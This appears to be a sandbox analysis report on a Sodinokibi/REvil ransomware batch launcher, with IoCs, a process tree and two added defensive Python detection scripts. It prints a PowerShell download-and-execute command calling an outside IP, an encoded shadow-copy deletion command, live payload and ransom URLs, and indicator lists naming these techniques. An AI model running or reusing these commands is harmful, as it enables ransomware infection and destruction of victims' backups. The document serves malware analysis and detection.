Analysis
max time kernel: 40s
max time network: 61s
platform: windows7_x64
resource: win7v200430
submitted: 02-06-2020 10:10
Static task: static1
Behavioral task: behavioral1, sample b4c987a88b89ef8fa5c5aeba0b67be50.bat, resource win7v200430
Behavioral task: behavioral2, sample b4c987a88b89ef8fa5c5aeba0b67be50.bat, resource win10v200430
The signatures and process tree below come from the windows7_x64 run (behavioral1, resource win7v200430).
General
Target: b4c987a88b89ef8fa5c5aeba0b67be50.bat
Size: 213B
MD5: 4eb17a9cecc3bdbd9c5f740e178603f1
SHA1: 2789a656216c376ff49aad51a0371dd670332170
SHA256: ce07460453840eb7611281737273b06d33142f8a78b30717f3a197de5471d2a7
SHA512: 1c771152007dacdd546e9f365dfc5221ba89223e5ecf63d2f14865bd71d7df5030331d3d794db13db7e4fd26f9825a2b02ceba7972b92c9da9f2d920ede55023
Malware Config
Extracted (second-stage URL from the launcher command line): http://185.103.242.78/pastes/b4c987a88b89ef8fa5c5aeba0b67be50
Extracted (ransom note): C:\lu34t0c25-readme.txt
Family: sodinokibi
URLs from the note, both carrying the same per-victim identifier D9F8304DE20EF488 in the path:
http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/D9F8304DE20EF488
http://decryptor.cc/D9F8304DE20EF488
The sample's file name, b4c987a88b89ef8fa5c5aeba0b67be50, is the paste identifier from the download URL, not a hash of the file itself (its MD5 is 4eb17a9cecc3bdbd9c5f740e178603f1, see General), so pivoting on the name finds the paste, not other copies of the launcher.
Signatures

Suspicious use of WriteProcessMemory (5 IoCs)
description | pid | process | target process
PID 608 wrote to memory of 1412 | 608 | cmd.exe | powershell.exe
PID 1412 wrote to memory of 1048 | 1412 | powershell.exe | powershell.exe
PID 1412 wrote to memory of 1048 | 1412 | powershell.exe | powershell.exe
PID 1412 wrote to memory of 1048 | 1412 | powershell.exe | powershell.exe
PID 1412 wrote to memory of 1048 | 1412 | powershell.exe | powershell.exe
Suspicious use of AdjustPrivilegeToken (7 IoCs)
description | pid | process
Token: SeDebugPrivilege | 1412 | powershell.exe
Token: SeDebugPrivilege | 1412 | powershell.exe
Token: SeDebugPrivilege | 1048 | powershell.exe
Token: SeBackupPrivilege | 752 | vssvc.exe
Token: SeRestorePrivilege | 752 | vssvc.exe
Token: SeAuditPrivilege | 752 | vssvc.exe
Token: SeTakeOwnershipPrivilege | 1412 | powershell.exe
Both powershell.exe instances (1412 and 1048) enable SeDebugPrivilege, and 1412 also enables SeTakeOwnershipPrivilege, which fits a process about to rewrite files it does not own. The vssvc.exe rows are the Volume Shadow Copy service adjusting its own token while it services the shadow copy deletion issued by PID 1048 (see Processes); they are a side effect of the attack, not token manipulation by the sample.
Modifies service (2 TTPs, 4 IoCs)
description | ioc | process
Key created | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Shadow Copy Optimization Writer | vssvc.exe
Key created | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Registry Writer | vssvc.exe
Key created | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\COM+ REGDB Writer | vssvc.exe
Key created | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\ASR Writer | vssvc.exe
These are VSS writer diagnostic keys that vssvc.exe itself creates when it enumerates writers; they record the shadow copy activity the sample triggered rather than a service the sample installed or modified for persistence.
Drops file in Program Files directory (18 IoCs)
description | ioc | process
File opened for modification | \??\c:\program files\LockSelect.ppsm | powershell.exe
File created | \??\c:\program files\microsoft sql server compact edition\lu34t0c25-readme.txt | powershell.exe
File opened for modification | \??\c:\program files\SuspendRestore.3gp | powershell.exe
File opened for modification | \??\c:\program files\UseAssert.svgz | powershell.exe
File opened for modification | \??\c:\program files\RegisterDebug.php | powershell.exe
File opened for modification | \??\c:\program files\StepConvert.mpeg | powershell.exe
File opened for modification | \??\c:\program files\SwitchMount.pptm | powershell.exe
File created | \??\c:\program files\lu34t0c25-readme.txt | powershell.exe
File opened for modification | \??\c:\program files\ConnectSet.kix | powershell.exe
File opened for modification | \??\c:\program files\ConvertFromResize.dotx | powershell.exe
File opened for modification | \??\c:\program files\InitializeReceive.css | powershell.exe
File created | \??\c:\program files (x86)\lu34t0c25-readme.txt | powershell.exe
File opened for modification | \??\c:\program files\AssertRemove.eps | powershell.exe
File created | \??\c:\program files\microsoft sql server compact edition\v3.5\desktop\lu34t0c25-readme.txt | powershell.exe
File opened for modification | \??\c:\program files\InvokeSave.pub | powershell.exe
File opened for modification | \??\c:\program files\StepSave.dotm | powershell.exe
File opened for modification | \??\c:\program files\TraceBackup.m1v | powershell.exe
File created | \??\c:\program files\microsoft sql server compact edition\v3.5\lu34t0c25-readme.txt | powershell.exe
The "File opened for modification" rows are the sandbox's pre-seeded documents under c:\program files being rewritten in place by PID 1412; the "File created" rows are the ransom note lu34t0c25-readme.txt dropped into every directory the encryptor walked, including Program Files (x86) and the SQL Server Compact Edition subtree.
Suspicious behavior: CmdExeWriteProcessMemorySpam (1 IoC)
pid | process
1412 | powershell.exe

Blacklisted process makes network request (1 IoC)
flow | pid | process
3 | 1412 | powershell.exe

Sets desktop wallpaper using registry (2 TTPs, 1 IoC)
description | ioc | process
Set value (str) | \REGISTRY\USER\S-1-5-21-910373003-3952921535-3480519689-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\l1i8wl767n.bmp" | powershell.exe
Sodin, Sodinokibi, REvil
Ransomware with advanced anti-analysis and privilege escalation functionality.

Enumerates connected drives (3 TTPs)

Suspicious behavior: EnumeratesProcesses (77 IoCs)
pid | process
1412 | powershell.exe
1048 | powershell.exe
(The report lists one row per event: 1048 powershell.exe appears twice and every other listed row is 1412 powershell.exe; only the two distinct pid/process pairs are kept here.)
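Two of the signatures above, the ransom note created in every directory the encryptor walked and the wallpaper pointed at a bitmap in the user's Temp folder, are cheap to turn into host detections. The following is an added example, not part of the report and not the sample's code, that runs such checks over events constructed from the report's own IoCs (plus one benign event for contrast). The event tuple layout, the file-name and path patterns, and the three-directory threshold are this example's assumptions.

```python
"""Host-event checks for two ransomware behaviours flagged in the report:
the same note file created across many directories, and the desktop
wallpaper pointed at a freshly written bitmap.

Added example; not code from the sandbox report or the sample. The events
are constructed from the 'Drops file in Program Files directory' and 'Sets
desktop wallpaper using registry' IoCs. The tuple layout, the regexes and
the min_dirs threshold are this example's own choices.
"""
import re
from collections import defaultdict
from pathlib import PureWindowsPath
from typing import Dict, List, Tuple

Event = Tuple[str, int, str, str]  # (kind, pid, process, detail)

# Constructed from the report's IoCs. 'detail' is an NT path for file events
# and 'key = value' for registry events, exactly as the report prints them.
EVENTS: List[Event] = [
    ('file_modified', 1412, 'powershell.exe', r'\??\c:\program files\LockSelect.ppsm'),
    ('file_created', 1412, 'powershell.exe', r'\??\c:\program files\microsoft sql server compact edition\lu34t0c25-readme.txt'),
    ('file_modified', 1412, 'powershell.exe', r'\??\c:\program files\SuspendRestore.3gp'),
    ('file_created', 1412, 'powershell.exe', r'\??\c:\program files\lu34t0c25-readme.txt'),
    ('file_created', 1412, 'powershell.exe', r'\??\c:\program files (x86)\lu34t0c25-readme.txt'),
    ('file_created', 1412, 'powershell.exe', r'\??\c:\program files\microsoft sql server compact edition\v3.5\desktop\lu34t0c25-readme.txt'),
    ('file_created', 1412, 'powershell.exe', r'\??\c:\program files\microsoft sql server compact edition\v3.5\lu34t0c25-readme.txt'),
    ('registry_set', 1412, 'powershell.exe',
     r'\REGISTRY\USER\S-1-5-21-910373003-3952921535-3480519689-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\l1i8wl767n.bmp"'),
    # Benign noise (constructed): a user saving a single readme in Notepad.
    ('file_created', 2200, 'notepad.exe', r'\??\c:\users\admin\documents\readme.txt'),
]

# Ransom notes are small text/HTML files whose name says "readme", "decrypt",
# "restore" or "recover"; the per-victim prefix varies, the suffix does not.
NOTE_NAME = re.compile(r'(?i)(readme|decrypt|restore|recover|how[_ -]?to).*\.(txt|hta|html?)$')
# Neither users nor Windows point the wallpaper at a bitmap that was just
# written under %LOCALAPPDATA%\Temp; ransomware does, to display the demand.
TEMP_BMP = re.compile(r'(?i)\\appdata\\local\\temp\\[^\\]+\.bmp$')


def strip_nt_prefix(path: str) -> str:
    """Turn the NT-style \\??\\c:\\... path the report prints into c:\\..."""
    return path[4:] if path.startswith('\\??\\') else path


def ransom_notes(events: List[Event], min_dirs: int = 3) -> Dict[Tuple[int, str], List[str]]:
    """Note-like files that one process created in at least min_dirs distinct directories.

    Returns {(pid, note_name): sorted directories}.
    """
    dirs = defaultdict(set)
    for kind, pid, _proc, detail in events:
        if kind != 'file_created':
            continue
        path = PureWindowsPath(strip_nt_prefix(detail))
        if NOTE_NAME.search(path.name):
            dirs[(pid, path.name.lower())].add(str(path.parent).lower())
    return {key: sorted(found) for key, found in dirs.items() if len(found) >= min_dirs}


def wallpaper_to_temp_bmp(events: List[Event]) -> List[Tuple[int, str, str]]:
    """Registry writes that point Control Panel\\Desktop\\Wallpaper at a .bmp in Temp."""
    hits = []
    for kind, pid, proc, detail in events:
        if kind != 'registry_set' or '\\control panel\\desktop\\wallpaper' not in detail.lower():
            continue
        _key, _sep, value = detail.partition(' = ')
        value = value.strip('"').replace('\\\\', '\\')  # undo the report's escaping
        if TEMP_BMP.search(value):
            hits.append((pid, proc, value))
    return hits


def assess(events: List[Event]) -> dict:
    """Run both checks; a PID that trips both is reported as ransomware-like."""
    notes = ransom_notes(events)
    wallpaper = wallpaper_to_temp_bmp(events)
    both = {pid for pid, _ in notes} & {pid for pid, _, _ in wallpaper}
    return {'ransom_notes': notes, 'wallpaper': wallpaper, 'ransomware_pids': sorted(both)}


if __name__ == '__main__':
    verdict = assess(EVENTS)
    for (pid, name), where in verdict['ransom_notes'].items():
        print(f'PID {pid} dropped {name} in {len(where)} directories')
    for pid, proc, value in verdict['wallpaper']:
        print(f'PID {pid} ({proc}) set wallpaper to {value}')
    print('ransomware-like PIDs:', verdict['ransomware_pids'])
```

Requiring the same note name in several directories, rather than a single creation, is what keeps the Notepad event out of the result; the name pattern alone would match it. Feed the function real file-create and registry-set telemetry in the same tuple shape and the checks apply unchanged.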
Processes

C:\Windows\system32\cmd.exe (PID 608)
  cmd /c "C:\Users\Admin\AppData\Local\Temp\b4c987a88b89ef8fa5c5aeba0b67be50.bat"
  - Suspicious use of WriteProcessMemory

  C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe (PID 1412, child of 608)
    C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "IEX (New-Object System.Net.WebClient).DownloadString('http://185.103.242.78/pastes/b4c987a88b89ef8fa5c5aeba0b67be50');Invoke-SCAPEB;Start-Sleep -s 10000"
    - Suspicious use of WriteProcessMemory
    - Suspicious use of AdjustPrivilegeToken
    - Drops file in Program Files directory
    - Suspicious behavior: CmdExeWriteProcessMemorySpam
    - Blacklisted process makes network request
    - Sets desktop wallpaper using registry
    - Suspicious behavior: EnumeratesProcesses

    C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe (PID 1048, child of 1412)
      powershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==
      (the -e argument is base64 of UTF-16LE text and decodes to: Get-WmiObject Win32_Shadowcopy | ForEach-Object {$_.Delete();})
      - Suspicious use of AdjustPrivilegeToken
      - Suspicious behavior: EnumeratesProcesses

C:\Windows\system32\vssvc.exe (PID 752)
  C:\Windows\system32\vssvc.exe
  - Suspicious use of AdjustPrivilegeToken
  - Modifies service

Reading the tree: the 213-byte .bat does nothing but launch 32-bit (SysWOW64) PowerShell with a download-and-execute cradle. The ransomware itself is the script fetched from the paste URL at run time; that script has to define Invoke-SCAPEB, since nothing else in the chain does, and the file rewrites and wallpaper change attributed to PID 1412 show the download succeeded in this run. PID 1048 is the child the script spawns to delete every shadow copy through WMI, and vssvc.exe (PID 752) is the Volume Shadow Copy service that carries out that request; it runs under the service control manager, which is why it sits at the top level of the tree rather than under the PowerShell chain. Start-Sleep -s 10000 keeps PID 1412 alive after the payload has run.
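Both malicious command lines in the tree are one-liners: a download-and-execute cradle and an -e (EncodedCommand) payload whose real content is invisible until decoded. The following added example, not part of the report or of the sample, decodes the -e argument the way PowerShell does (base64, then UTF-16LE) and tags the effective command text. The only inputs taken from the report are the two command lines; the regexes, indicator lists and function names are this example's own.

```python
"""Triage of the PowerShell command lines from the process tree above.

Added example; not code from the sandbox report or from the sample. Only
the two command lines are copied from the report. The function names, the
-EncodedCommand regex and the indicator lists are this example's own.
"""
import base64
import re
from typing import Dict, List, Optional

# Command lines exactly as shown in the process tree (PID -> command line).
CMDLINES: Dict[int, str] = {
    1412: ('C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe '
           '"IEX (New-Object System.Net.WebClient).DownloadString('
           "'http://185.103.242.78/pastes/b4c987a88b89ef8fa5c5aeba0b67be50');"
           'Invoke-SCAPEB;Start-Sleep -s 10000"'),
    1048: 'powershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==',
}

# -e, -ec, -en, -enc and -EncodedCommand all select the same parameter:
# PowerShell accepts any unambiguous prefix, case-insensitively.
ENCODED_FLAG = re.compile(
    r'(?i)(?:^|\s)-e(?:ncodedcommand|nc|n|c)?\s+([A-Za-z0-9+/=]+)')
URL_RE = re.compile(r'https?://[^\s\'"()<>]+')

# Substrings (compared lower-cased) that mark a technique in the effective
# command text. Illustrative lists, not a complete ruleset.
INDICATORS: Dict[str, List[str]] = {
    'download_cradle': ['downloadstring', 'downloadfile', 'net.webclient',
                        'invoke-webrequest', 'invoke-restmethod'],
    'in_memory_execution': ['iex ', 'iex(', 'invoke-expression'],
    'shadow_copy_deletion': ['win32_shadowcopy', 'vssadmin delete shadows',
                             'wmic shadowcopy', 'shadowcopy delete'],
}


def decode_encoded_command(cmdline: str) -> Optional[str]:
    """Return the -EncodedCommand payload as text, or None if absent or invalid.

    PowerShell requires the argument to be base64 of UTF-16LE text, so a value
    that is not valid base64, or that decodes to an odd number of bytes or to
    invalid UTF-16LE, is reported as no encoded command.
    """
    match = ENCODED_FLAG.search(cmdline)
    if match is None:
        return None
    b64 = match.group(1)
    b64 += '=' * (-len(b64) % 4)  # tolerate payloads with the padding stripped
    try:
        return base64.b64decode(b64, validate=True).decode('utf-16-le')
    except (ValueError, UnicodeDecodeError):
        return None


def classify(cmdline: str) -> dict:
    """Decode any encoded payload, then tag and extract URLs from the result."""
    decoded = decode_encoded_command(cmdline)
    effective = cmdline if decoded is None else cmdline + '\n' + decoded
    lowered = effective.lower()
    tags = sorted(tag for tag, needles in INDICATORS.items()
                  if any(needle in lowered for needle in needles))
    return {'decoded': decoded, 'urls': URL_RE.findall(effective), 'tags': tags}


def triage_tree(cmdlines: Dict[int, str] = CMDLINES) -> Dict[int, dict]:
    """Classify every command line in a process tree, keyed by PID."""
    return {pid: classify(cmd) for pid, cmd in cmdlines.items()}


if __name__ == '__main__':
    for pid, result in triage_tree().items():
        print(pid, result['tags'], result['urls'])
        if result['decoded']:
            print('   decoded:', result['decoded'])
```

Run it directly to print the tags per PID. The check decodes before matching, which is the point: the Win32_Shadowcopy indicator fires on PID 1048 even though that string never appears literally in its command line, and a rule that only inspects the raw command line would miss it.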